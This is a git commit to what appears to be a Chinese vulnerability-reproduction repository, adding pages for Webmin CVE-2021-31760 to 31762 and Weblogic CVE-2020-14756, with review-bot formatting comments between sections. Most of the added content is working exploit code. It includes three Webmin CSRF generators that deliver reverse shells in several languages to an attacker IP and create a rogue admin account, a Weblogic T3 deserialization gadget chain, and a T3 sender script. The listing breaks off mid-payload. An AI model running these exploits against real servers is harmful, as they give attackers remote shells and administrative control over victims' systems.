Update vulnerabilities

This commit is contained in:
Threekiii 2022-12-07 15:39:19 +08:00
parent 9acf184afd
commit 56f46b9d98
14 changed files with 1151 additions and 0 deletions

View File

@ -4,6 +4,11 @@
ZZZCMS parserSearch 存在模板注入导致远程命令执行漏洞
参考链接:
- https://srcincite.io/advisories/src-2021-0015/
- https://nvd.nist.gov/vuln/detail/CVE-2021-32605
## 漏洞影响
```
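Review bot: the ZZZCMS title line `ZZZCMS parserSearch 存在模板注入导致远程命令执行漏洞` still carries no CVE id even though the new reference list points at `https://nvd.nist.gov/vuln/detail/CVE-2021-32605`; put the id in the title as the Webmin and Weblogic entries in this commit do (e.g. `Webmin rpc.cgi 后台远程命令执行漏洞 CVE-2019-15642`), so the page is found by a CVE search and matches the form of the README index lines.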

View File

@ -287,6 +287,7 @@
* Webmin password_change.cgi 远程命令执行漏洞 CVE-2019-15107
* Webmin rpc.cgi 后台远程命令执行漏洞 CVE-2019-15642
* Webmin update.cgi 后台远程命令执行漏洞 CVE-2022-0824
* Webmin 多个高危漏洞 CVE-2021-31760~62
* WiseGiga NAS down_data.php 任意文件下载漏洞
* WiseGiga NAS group.php 远程命令执行漏洞
* WSO2 fileupload 任意文件上传漏洞 CVE-2022-29464
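Review bot: the new index line `Webmin 多个高危漏洞 CVE-2021-31760~62` compresses three identifiers into a range, while every neighbouring entry (`Webmin update.cgi 后台远程命令执行漏洞 CVE-2022-0824`, `WSO2 fileupload 任意文件上传漏洞 CVE-2022-29464`) carries a full id; spell out CVE-2021-31760, CVE-2021-31761 and CVE-2021-31762 so an exact-match search for any one of them hits the index, and use the same form in the file heading.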
@ -434,6 +435,7 @@
* PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381
* Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109
* WebLogic Local File Inclusion 本地文件包含漏洞 CVE-2022-21371
* Weblogic Server远程代码执行漏洞 CVE-2020-14756
* Weblogic SSRF漏洞 CVE-2014-4210
* WebLogic T3 反序列化漏洞 CVE-2016-3510
* Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271
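Review bot: `Weblogic Server远程代码执行漏洞 CVE-2020-14756` is missing the space between the product name and the Chinese description that the sibling entries use (`WebLogic T3 反序列化漏洞 CVE-2016-3510`, `Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271`); add it so the index line and the file heading are identical strings.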
@ -500,16 +502,23 @@
* Saltstack 未授权RCE漏洞 CVE-2021-25281~25283
* SaltStack 未授权访问命令执行漏洞 CVE-2020-16846 25592
* Saltstack 远程命令执行漏洞 CVE-2020-11651 11652
* VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973
* VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972
* VMware vCenter 任意文件读取漏洞
* VMware View Planner 未授权RCE CVE-2021-21978
* VMware vRealize Operations Manager SSRF漏洞 CVE-2021-21975
* VMware Workspace ONE Access SSTI漏洞 CVE-2022-22954
* VoIPmonitor 远程命令执行漏洞 CVE-2021-30461
* Wazuh Manager 代码执行漏洞 CVE-2021-26814
* Windows Chrome 远程命令执行漏洞
* WordPress 3DPrint Lite 3dprint-lite-functions.php 任意文件上传漏洞
* WordPress All-in-One Video Gallery video.php 任意文件读取漏洞 CVE-2022-2633
* WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738
* WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175
* WordPress File Manager6.9 RCE CVE-2020-25213
* WordPress Redux Framework class-redux-helpers.php 敏感信息泄漏漏洞 CVE-2021-38314
* WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119
* WordPress SuperForms 4.9 任意文件上传到远程代码执行
* WordPress WP_Query SQL 注入漏洞 CVE-2022-21661
* 向日葵 check 远程命令执行漏洞 CNVD-2022-10270
- 网络设备漏洞
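Review bot: the index line `Wazuh Manager 代码执行漏洞 CVE-2021-26814` drops the fact that the issue is post-authentication (the Wazuh file added in this commit says `允许经过身份验证的用户`), whereas the Webmin entries above mark post-auth issues with `后台`; add the same qualifier so anyone triaging from the index does not read it as pre-auth. `VMware View Planner 未授权RCE CVE-2021-21978` also abbreviates to `RCE` while the adjacent line spells `远程代码执行漏洞`; pick one form for the whole list.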

View File

@ -0,0 +1,486 @@
# Webmin 多个高危漏洞 CVE-2021-31760~62
## 漏洞描述
CVE-2021-31760:利用CSRF攻击实现对Webmin的远程命令执行。
CVE-2021-31761:利用XSS攻击实现对Webmin的远程命令执行。
CVE-2021-31762:利用CSRF攻击通过Webmin的添加用户功能创建特权用户然后通过特权用户权限反弹shell。
参考链接:
- CVE-2021-31760https://github.com/electronicbots/CVE-2021-31760
- CVE-2021-31761https://github.com/electronicbots/CVE-2021-31761
- CVE-2021-31762https://github.com/electronicbots/CVE-2021-31762
## 漏洞影响
```
Webmin <= 1.973
```
## FOFA
```
app="Webmin"
```
## 漏洞复现
CVE-2021-31760 poc
```python
import time, subprocess,random
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m''')
for i in range(101):
print(
"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
i), "\033[1;36m%\033[1;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
target = target + 'proc/run.cgi'
else:
target = target + '/proc/run.cgi'
ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
ReverseShell = input \
('''\033[1;37m
\n
1- Bash Reverse Shell \n
2- PHP Reverse Shell \n
3- Python Reverse Shell \n
4- Perl Reverse Shell \n
5- Ruby Reverse Shell \n
\033[1;m
\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
file_name = random.randrange(1000)
if ReverseShell == '1':
ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
elif ReverseShell == '2':
ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
elif ReverseShell == '3':
ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
elif ReverseShell == '4':
ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
elif ReverseShell == '5':
ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
else:
print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
def CSRF_Generator():
with open('CSRF_POC.html', 'w') as POC:
POC.write \
('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="''' + target +'''" method="POST">
<input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="input" value="" />
<input type="hidden" name="undefined" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
POC.close()
print(
"\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and wait for your Reverse Shell ^_^ \n \033[1;m")
def Netcat_listener():
print()
subprocess.run(["nc", "-nlvp "+port+""])
def main():
CSRF_Generator()
Netcat_listener()
if __name__ == '__main__':
main()
```
CVE-2021-31761 poc
```python
import time, subprocess,random,urllib.parse
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m''')
for i in range(101):
print(
"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
i), "\033[1;36m%\033[1;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
target = target + 'tunnel/link.cgi/'
else:
target = target + '/tunnel/link.cgi/'
ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
ReverseShell = input \
('''\033[1;37m
\n
1- Bash Reverse Shell \n
2- PHP Reverse Shell \n
3- Python Reverse Shell \n
4- Perl Reverse Shell \n
5- Ruby Reverse Shell \n
\033[1;m
\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
file_name = random.randrange(1000)
if ReverseShell == '1':
ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
elif ReverseShell == '2':
ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
elif ReverseShell == '3':
ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
elif ReverseShell == '4':
ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
elif ReverseShell == '5':
ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
else:
print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
def CSRF_Generator():
Payload = urllib.parse.quote('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="/proc/run.cgi" method="POST">
<input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="input" value="" />
<input type="hidden" name="undefined" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m")
print(target+Payload)
def Netcat_listener():
print()
subprocess.run(["nc", "-nlvp "+port+""])
def main():
CSRF_Generator()
Netcat_listener()
if __name__ == '__main__':
main()
```
CVE-2021-31762 poc
```python
import time
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m''')
for i in range(101):
print(
"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
i), "\033[1;36m%\033[1;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
target = target + 'acl/save_user.cgi'
else:
target = target + '/acl/save_user.cgi'
def CSRF_Generator():
with open('CSRF_POC.html', 'w') as POC:
POC.write \
('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="'''+target+'''" method="POST">
<input type="hidden" name="safe" value="" />
<input type="hidden" name="name" value="Mesh3l&#95;Z0ldyck" />
<input type="hidden" name="pass&#95;def" value="0" />
<input type="hidden" name="pass" value="Mesh3l&#95;Z0ldyck123" />
<input type="hidden" name="real" value="Mesh3l&#95;Z0ldyck" />
<input type="hidden" name="cert&#95;def" value="1" />
<input type="hidden" name="lang&#95;def" value="1" />
<input type="hidden" name="lang" value="af" />
<input type="hidden" name="notabs" value="0" />
<input type="hidden" name="theme&#95;def" value="1" />
<input type="hidden" name="theme" value="" />
<input type="hidden" name="overlay&#95;def" value="1" />
<input type="hidden" name="overlay" value="overlay&#45;theme" />
<input type="hidden" name="logouttime&#95;def" value="1" />
<input type="hidden" name="minsize&#95;def" value="1" />
<input type="hidden" name="ipmode" value="0" />
<input type="hidden" name="ips" value="" />
<input type="hidden" name="days&#95;def" value="1" />
<input type="hidden" name="hours&#95;def" value="1" />
<input type="hidden" name="hours&#95;hfrom" value="" />
<input type="hidden" name="hours&#95;mfrom" value="" />
<input type="hidden" name="hours&#95;hto" value="" />
<input type="hidden" name="hours&#95;mto" value="" />
<input type="hidden" name="mod" value="backup&#45;config" />
<input type="hidden" name="mod" value="change&#45;user" />
<input type="hidden" name="mod" value="webmincron" />
<input type="hidden" name="mod" value="usermin" />
<input type="hidden" name="mod" value="webminlog" />
<input type="hidden" name="mod" value="webmin" />
<input type="hidden" name="mod" value="help" />
<input type="hidden" name="mod" value="servers" />
<input type="hidden" name="mod" value="acl" />
<input type="hidden" name="mod" value="bacula&#45;backup" />
<input type="hidden" name="mod" value="init" />
<input type="hidden" name="mod" value="passwd" />
<input type="hidden" name="mod" value="quota" />
<input type="hidden" name="mod" value="mount" />
<input type="hidden" name="mod" value="fsdump" />
<input type="hidden" name="mod" value="ldap&#45;client" />
<input type="hidden" name="mod" value="ldap&#45;useradmin" />
<input type="hidden" name="mod" value="logrotate" />
<input type="hidden" name="mod" value="mailcap" />
<input type="hidden" name="mod" value="mon" />
<input type="hidden" name="mod" value="pam" />
<input type="hidden" name="mod" value="certmgr" />
<input type="hidden" name="mod" value="proc" />
<input type="hidden" name="mod" value="at" />
<input type="hidden" name="mod" value="cron" />
<input type="hidden" name="mod" value="sentry" />
<input type="hidden" name="mod" value="man" />
<input type="hidden" name="mod" value="syslog" />
<input type="hidden" name="mod" value="syslog&#45;ng" />
<input type="hidden" name="mod" value="system&#45;status" />
<input type="hidden" name="mod" value="useradmin" />
<input type="hidden" name="mod" value="apache" />
<input type="hidden" name="mod" value="bind8" />
<input type="hidden" name="mod" value="pserver" />
<input type="hidden" name="mod" value="dhcpd" />
<input type="hidden" name="mod" value="dhcp&#45;dns" />
<input type="hidden" name="mod" value="dovecot" />
<input type="hidden" name="mod" value="exim" />
<input type="hidden" name="mod" value="fetchmail" />
<input type="hidden" name="mod" value="foobar" />
<input type="hidden" name="mod" value="frox" />
<input type="hidden" name="mod" value="jabber" />
<input type="hidden" name="mod" value="ldap&#45;server" />
<input type="hidden" name="mod" value="majordomo" />
<input type="hidden" name="mod" value="htpasswd&#45;file" />
<input type="hidden" name="mod" value="minecraft" />
<input type="hidden" name="mod" value="mysql" />
<input type="hidden" name="mod" value="openslp" />
<input type="hidden" name="mod" value="postfix" />
<input type="hidden" name="mod" value="postgresql" />
<input type="hidden" name="mod" value="proftpd" />
<input type="hidden" name="mod" value="procmail" />
<input type="hidden" name="mod" value="qmailadmin" />
<input type="hidden" name="mod" value="mailboxes" />
<input type="hidden" name="mod" value="sshd" />
<input type="hidden" name="mod" value="samba" />
<input type="hidden" name="mod" value="sendmail" />
<input type="hidden" name="mod" value="spam" />
<input type="hidden" name="mod" value="squid" />
<input type="hidden" name="mod" value="sarg" />
<input type="hidden" name="mod" value="wuftpd" />
<input type="hidden" name="mod" value="webalizer" />
<input type="hidden" name="mod" value="link" />
<input type="hidden" name="mod" value="adsl&#45;client" />
<input type="hidden" name="mod" value="bandwidth" />
<input type="hidden" name="mod" value="fail2ban" />
<input type="hidden" name="mod" value="firewalld" />
<input type="hidden" name="mod" value="ipsec" />
<input type="hidden" name="mod" value="krb5" />
<input type="hidden" name="mod" value="firewall" />
<input type="hidden" name="mod" value="firewall6" />
<input type="hidden" name="mod" value="exports" />
<input type="hidden" name="mod" value="exports&#45;nfs4" />
<input type="hidden" name="mod" value="xinetd" />
<input type="hidden" name="mod" value="inetd" />
<input type="hidden" name="mod" value="pap" />
<input type="hidden" name="mod" value="ppp&#45;client" />
<input type="hidden" name="mod" value="pptp&#45;client" />
<input type="hidden" name="mod" value="pptp&#45;server" />
<input type="hidden" name="mod" value="stunnel" />
<input type="hidden" name="mod" value="shorewall" />
<input type="hidden" name="mod" value="shorewall6" />
<input type="hidden" name="mod" value="itsecur&#45;firewall" />
<input type="hidden" name="mod" value="tcpwrappers" />
<input type="hidden" name="mod" value="idmapd" />
<input type="hidden" name="mod" value="filter" />
<input type="hidden" name="mod" value="burner" />
<input type="hidden" name="mod" value="grub" />
<input type="hidden" name="mod" value="lilo" />
<input type="hidden" name="mod" value="raid" />
<input type="hidden" name="mod" value="lvm" />
<input type="hidden" name="mod" value="fdisk" />
<input type="hidden" name="mod" value="lpadmin" />
<input type="hidden" name="mod" value="smart&#45;status" />
<input type="hidden" name="mod" value="time" />
<input type="hidden" name="mod" value="vgetty" />
<input type="hidden" name="mod" value="iscsi&#45;client" />
<input type="hidden" name="mod" value="iscsi&#45;server" />
<input type="hidden" name="mod" value="iscsi&#45;tgtd" />
<input type="hidden" name="mod" value="iscsi&#45;target" />
<input type="hidden" name="mod" value="cluster&#45;passwd" />
<input type="hidden" name="mod" value="cluster&#45;copy" />
<input type="hidden" name="mod" value="cluster&#45;cron" />
<input type="hidden" name="mod" value="cluster&#45;shell" />
<input type="hidden" name="mod" value="cluster&#45;shutdown" />
<input type="hidden" name="mod" value="cluster&#45;usermin" />
<input type="hidden" name="mod" value="cluster&#45;useradmin" />
<input type="hidden" name="mod" value="cluster&#45;webmin" />
<input type="hidden" name="mod" value="cfengine" />
<input type="hidden" name="mod" value="heartbeat" />
<input type="hidden" name="mod" value="shell" />
<input type="hidden" name="mod" value="custom" />
<input type="hidden" name="mod" value="disk&#45;usage" />
<input type="hidden" name="mod" value="export&#45;test" />
<input type="hidden" name="mod" value="ftelnet" />
<input type="hidden" name="mod" value="filemin" />
<input type="hidden" name="mod" value="flashterm" />
<input type="hidden" name="mod" value="tunnel" />
<input type="hidden" name="mod" value="file" />
<input type="hidden" name="mod" value="phpini" />
<input type="hidden" name="mod" value="cpan" />
<input type="hidden" name="mod" value="htaccess&#45;htpasswd" />
<input type="hidden" name="mod" value="telnet" />
<input type="hidden" name="mod" value="ssh" />
<input type="hidden" name="mod" value="ssh2" />
<input type="hidden" name="mod" value="shellinabox" />
<input type="hidden" name="mod" value="status" />
<input type="hidden" name="mod" value="ajaxterm" />
<input type="hidden" name="mod" value="updown" />
<input type="hidden" name="mod" value="vnc" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
POC.close()
print(
"\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m")
def main():
CSRF_Generator()
if __name__ == '__main__':
main()
```
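Review bot: the three reference links (`CVE-2021-31760https://github.com/electronicbots/CVE-2021-31760` and the two below it) have the CVE id fused to the URL with no separator, so they neither read nor render as links; put a colon or space after each id. The description for CVE-2021-31762 claims the forged request creates a privileged user `然后通过特权用户权限反弹shell`, but the third PoC only writes `CSRF_POC.html` and prints the credentials (its `main()` calls `CSRF_Generator()` alone), so either end the description at user creation or say the shell step is manual. The affected-version block gives only `Webmin <= 1.973`; add the release that fixes the three issues so the entry tells readers what to upgrade to. Style: the banner, progress loop and reverse-shell menu are pasted verbatim three times; one block per CVE that shows only the differing endpoint (`proc/run.cgi`, `tunnel/link.cgi/`, `acl/save_user.cgi`) would make the three vectors far easier to compare.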

View File

@ -0,0 +1,116 @@
# Weblogic Server 远程代码执行漏洞 CVE-2020-14756
## 漏洞描述
weblogic的T3协议反序列化漏洞一直是一个比较热门也比较好用的漏洞weblogic针对该漏洞的解决方案就是不断填充黑名单在高版本jdk下配合jep290机制实现黑名单在低版本下配合resolveClass进行防御所以安全人员对于T3反序列化的利用也是一直在寻找黑名单之外的利用链。
CVE-2020-14756 这个漏洞的利用比较巧妙通过利用weblogic coherence组件中的类绕过了黑名单机制的检测重新能够利用黑名单中的类造成代码执行。
参考链接:
- https://www.oracle.com/security-alerts/cpujan2021.html#AppendixFMW
- https://github.com/Y4er/CVE-2020-14756
## 漏洞影响
```
Oracle Weblogic Server 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
```
## 漏洞复现
CVE_2020_14756.java
```
package com.supeream;
import com.supeream.serial.Serializables;
import com.supeream.weblogic.T3ProtocolOperation;
// coherence-rest.jar
import com.tangosol.coherence.rest.util.extractor.MvelExtractor;
// coherence-web.jar
import com.tangosol.coherence.servlet.AttributeHolder;
// coherence.jar
import com.tangosol.util.SortedBag;
import com.tangosol.util.aggregator.TopNAggregator;
import java.io.File;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
public class CVE_2020_14756 {
public static void main(String[] args) {
MvelExtractor extractor = new MvelExtractor("java.lang.Runtime.getRuntime().exec(\"calc\");");
MvelExtractor extractor2 = new MvelExtractor("");
try {
SortedBag sortedBag = new TopNAggregator.PartialResult(extractor2, 2);
AttributeHolder attributeHolder = new AttributeHolder();
sortedBag.add(1);
Field m_comparator = sortedBag.getClass().getSuperclass().getDeclaredField("m_comparator");
m_comparator.setAccessible(true);
m_comparator.set(sortedBag, extractor);
Method setInternalValue = attributeHolder.getClass().getDeclaredMethod("setInternalValue", Object.class);
setInternalValue.setAccessible(true);
setInternalValue.invoke(attributeHolder, sortedBag);
/*
FileOutputStream fileOutputStream = new FileOutputStream(new File("test.ser"));
ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);
objectOutputStream.writeObject(attributeHolder);
*/
T3ProtocolOperation.send("192.168.65.128", "7001", Serializables.serialize(attributeHolder));
} catch (Exception e) {
e.printStackTrace();
}
}
}
```
weblogic_t3.py
```py
#!/usr/bin/python
import socket
import os
import sys
import struct
if len(sys.argv) < 3:
print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0])
sys.exit()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] Connecting to %s port %s' % server_address
sock.connect(server_address)
# Send headers
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print 'sending "%s"' % headers
sock.sendall(headers)
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data
payloadObj = open(sys.argv[3],'rb').read()
payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
payload=payload+payloadObj
payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x6